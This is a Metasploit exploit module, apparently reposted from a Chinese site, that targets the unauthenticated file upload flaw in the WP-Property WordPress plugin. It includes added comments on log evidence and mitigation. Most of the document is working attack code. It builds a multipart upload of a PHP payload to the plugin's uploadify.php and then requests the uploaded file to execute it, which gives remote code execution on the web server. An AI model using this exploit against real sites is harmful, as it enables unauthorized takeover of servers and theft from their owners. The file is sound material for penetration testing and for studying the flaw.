WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

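# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0 according to the module description; see the
# OSVDB/BID/EDB references below).
#
# What the module does, as visible in this file:
#   1. POSTs a multipart form to
#      <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#      with a "Filedata" part (a randomly named .php file) and a "folder" field.
#   2. Issues a GET for whatever path the upload response body contains.
#
# Notes for defenders and assessors:
#   * Web-server logs are the primary evidence: an unauthenticated POST to
#     uploadify.php followed shortly by a GET for a five-letter .php file.
#     The payload is requested with :unlink_self => true, so the uploaded
#     file has presumably removed itself by the time the host is examined
#     (confirm against the PhpEXE mixin).
#   * Mitigation is outside this file: update the plugin to a release newer
#     than the affected range, remove or deny access to the bundled
#     uploadify.php, and disable PHP execution in directories that accept
#     uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The pasted source read "Msf::Exploit: hpEXE" (the "::P" was lost in
  # extraction); the mixin loaded by 'msf/core/exploit/php_exe' is PhpEXE.
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the
  # TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify.php script with a single GET.
  #
  # A 200 response only shows that the script is reachable; no plugin
  # version is read, so "Appears" here is not confirmation that the
  # installed release is in the affected range. Verify the plugin version
  # before reporting a finding.
  #
  # @return [Exploit::CheckCode::Unknown] no response or a non-200 status
  # @return [Exploit::CheckCode::Appears] the script answered with 200
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200

    Exploit::CheckCode::Appears
  end

  # Uploads the PHP payload through uploadify.php and then requests it.
  #
  # Fails with Exploit::Failure::UnexpectedReply when the upload response is
  # missing, is not a 200, or does not mention the uploaded file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form fields: the file itself and the destination folder, which is
    # set to the uploadify directory under the plugin.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary at the start of a line;
    # presumably the target's parser rejects the extra blank line (confirm).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if res.nil? || res.code != 200 || res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the request path; it looks like
    # uploadify.php echoes the stored location of the file (confirm).
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end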
不要问我这写的是什么 怎么利用 我是说msf.